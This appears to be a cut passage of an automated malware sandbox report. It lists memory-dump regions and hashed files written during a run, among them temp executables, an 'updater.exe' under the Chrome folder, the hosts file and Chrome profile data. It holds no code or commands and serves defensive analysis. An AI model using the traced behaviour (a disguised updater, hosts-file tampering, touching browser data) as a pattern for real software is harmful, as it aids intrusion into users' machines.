memory/4700-170-0x00007FF72D1D0000-0x00007FF72E3F6000-memory.dmp

memory/4700-171-0x00007FF9C7330000-0x00007FF9C7525000-memory.dmp

memory/4700-172-0x00007FF72D1D0000-0x00007FF72E3F6000-memory.dmp

memory/4700-173-0x00007FF72D1D0000-0x00007FF72E3F6000-memory.dmp

memory/4700-174-0x00007FF72D1D0000-0x00007FF72E3F6000-memory.dmp

memory/4700-175-0x00007FF72D1D0000-0x00007FF72E3F6000-memory.dmp

memory/4700-176-0x00007FF72D1D0000-0x00007FF72E3F6000-memory.dmp

memory/4700-177-0x00007FF72D1D0000-0x00007FF72E3F6000-memory.dmp

memory/4700-178-0x00007FF9C7330000-0x00007FF9C7525000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

memory/2888-187-0x0000000000CB0000-0x0000000000F3B000-memory.dmp

memory/2888-189-0x0000000000CB0000-0x0000000000F3B000-memory.dmp

memory/1408-188-0x0000000000800000-0x0000000000927000-memory.dmp

memory/1408-197-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-196-0x0000000000800000-0x0000000000927000-memory.dmp

memory/1408-199-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-198-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-200-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-201-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-202-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-203-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-205-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-204-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-206-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-207-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-208-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-209-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-211-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-210-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-212-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-213-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-214-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-215-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-216-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-217-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-218-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-219-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-220-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-221-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-222-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-223-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-224-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-225-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-226-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-228-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-227-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-229-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-231-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-232-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-230-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-233-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-234-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-235-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-236-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-237-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-238-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-239-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-240-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-241-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-242-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-243-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-244-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-245-0x00000000FF4B0000-0x00000000FF4C0000-memory.dmp

memory/1408-264-0x0000000077472000-0x0000000077473000-memory.dmp

memory/2888-271-0x0000000000CB0000-0x0000000000F3B000-memory.dmp

memory/3808-307-0x00000199755A0000-0x00000199755C2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_q5rwxw3g.b3m.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3808-312-0x00007FF9A8590000-0x00007FF9A9051000-memory.dmp

memory/3808-313-0x00000199596A0000-0x00000199596B0000-memory.dmp

memory/3808-315-0x00000199596A0000-0x00000199596B0000-memory.dmp

memory/3808-314-0x00000199596A0000-0x00000199596B0000-memory.dmp

memory/3808-316-0x00000199596A0000-0x00000199596B0000-memory.dmp

memory/3808-319-0x00007FF9A8590000-0x00007FF9A9051000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

memory/4936-323-0x00007FF9A8590000-0x00007FF9A9051000-memory.dmp

memory/4936-324-0x000001A3A59F0000-0x000001A3A5A00000-memory.dmp

memory/4936-325-0x000001A3A59F0000-0x000001A3A5A00000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d28a889fd956d5cb3accfbaf1143eb6f
SHA1 157ba54b365341f8ff06707d996b3635da8446f7
SHA256 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA512 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

memory/4936-336-0x000001A3A59F0000-0x000001A3A5A00000-memory.dmp

memory/4936-337-0x000001A3A59F0000-0x000001A3A5A00000-memory.dmp

memory/4936-339-0x00007FF9A8590000-0x00007FF9A9051000-memory.dmp

memory/4700-342-0x00007FF9C7330000-0x00007FF9C7525000-memory.dmp

C:\Program Files\Google\Chrome\updater.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

memory/4700-344-0x00007FF72D1D0000-0x00007FF72E3F6000-memory.dmp

memory/2708-346-0x00007FF774440000-0x00007FF775666000-memory.dmp

memory/2708-347-0x00007FF9C7330000-0x00007FF9C7525000-memory.dmp

memory/2708-353-0x00007FF774440000-0x00007FF775666000-memory.dmp

memory/2708-355-0x00007FF9C7330000-0x00007FF9C7525000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cc.exe

MD5 858f82fe9166c34b6709a3adfe6a625f
SHA1 63275e4b77e0fe6fa6f1db716b5963b69b68f8a5
SHA256 8ec2c1bb10e05a5129269488b53a46c6b5be3691c61ef7da7c6eecf1c0444b28
SHA512 1338082ebb6bf658125cd6d72f5885c78865c1abbed50fd10317dacaf41a450eb98b949631f1a1b94a67d335b23cfc0fa78d0d8db3d726adf2a57af50307b89e

memory/2084-363-0x0000000000EA0000-0x00000000014D4000-memory.dmp

memory/4612-365-0x0000000074960000-0x0000000075110000-memory.dmp

memory/2084-366-0x0000000077474000-0x0000000077476000-memory.dmp

memory/2084-369-0x0000000000B30000-0x0000000000BA0000-memory.dmp

memory/2084-370-0x0000000074970000-0x0000000075120000-memory.dmp

memory/2084-371-0x0000000003860000-0x0000000003870000-memory.dmp

memory/2084-372-0x0000000003860000-0x0000000003870000-memory.dmp

memory/2084-373-0x0000000003860000-0x0000000003870000-memory.dmp

memory/2084-374-0x0000000005E60000-0x0000000005E82000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User DataIEK8V\CrashpadMetrics-active.pma

MD5 03c4f648043a88675a920425d824e1b3
SHA1 b98ce64ab5f7a187d19deb8f24ca4ab5d9720a6d
SHA256 f91dbb7c64b4582f529c968c480d2dce1c8727390482f31e4355a27bb3d9b450
SHA512 2473f21cf8747ec981db18fb42726c767bbcca8dd89fd05ffd2d844206a6e86da672967462ac714e6fb43cc84ac35fffcec7ddc43a9357c1f8ed9d14105e9192

C:\Windows\system32\drivers\etc\hosts

MD5 2d29fd3ae57f422e2b2121141dc82253
SHA1 c2464c857779c0ab4f5e766f5028fcc651a6c6b7
SHA256 80a60d7ec533d820de20bcedeb41319e7b1def548b6ea73ddbd69455bac4e7a4
SHA512 077a5c554663be7b71f181d961f5c98c732bc296dc015ffee30768a648bee3aad62c39c352cf2947432be19519906aeac7dfaf2557d309bb460732abb7fdbc68

C:\Users\Admin\AppData\Local\Google\Chrome\User DataIEK8V\Local State

MD5 341334d72e85b623fa4675310b74fb18
SHA1 621494b94702d5904b4ccfd0da2a2e3bceeebd9e
SHA256 72d92853c4ccaef514fe4b7524d0f4b0d0dc1a39a076370437558159d107850b
SHA512 62f2331e591bf34cedb58714e073a0181065b760105addaf18dc64a35c84efe039b03a741001381e61e6117f89f4111d8ffb5f719fafd5fa67d19df2a03df82c

\??\pipe\crashpad_2380_KGOYIITKSFJLLNBK

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User DataIEK8V\Default\Network\Reporting and NEL

MD5 1db78c17617644d656b52fa1b5d61377
SHA1 a0a5d9c67f3963a807baa2e576a44a4accd9c830
SHA256 c070d8478b42ea9ea85add1d4c961a322479622ef1f1c1e1d35ac50f95a781ba
SHA512 5f4c8930fbad7eed61d66b2e1ed06f58b824ed99c8bcd1455d5d1e1bf6e42a328e9b69adaa293c5adf37764c952cbaf95e5719c92ec14ad13b8a16856942b53b

C:\Users\Admin\AppData\Local\Google\Chrome\User DataIEK8V\Default\Network\TransportSecurity

MD5 b6faa14a9b0d5b66ef7393f2cb9b6e34
SHA1 22e51e0d23ab76fbb74f283e1d04dd068b4c4f14
SHA256 13c0143956e52f5be950cacabd1d60015654b1c80696a457be952669872c12a0
SHA512 daceea65ed050335b0cf83e1b66fe37bae334c5a99cbe508275d92d62df8582cc8deb18a7ef4f6e6569c510f33676fcd5a167bec8fac91960bee0e9cd507f6ce

C:\Users\Admin\AppData\Local\Google\Chrome\User DataIEK8V\Default\Network\Network Persistent State

MD5 71948d250cf71557945e41f4b826e749
SHA1 4f86826facdadb1f540340d8ebd0eb3dcbebc81f
SHA256 9f667c69b121f38b751f261534d3779e7c5d7764fc05c48ca867083b3e5d15b1
SHA512 f2b6d6d23d5a63c430c16fc2b6364adac351340b8b9562890105fea8e4befe82f7f61effa778673c96f16a259aa6161110599abb087d4be17bdc35bdf2931d18

C:\Users\Admin\AppData\Local\Google\Chrome\User DataIEK8V\Default\Local Storage\leveldb\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Local\Google\Chrome\User DataIEK8V\Default\Local Storage\leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b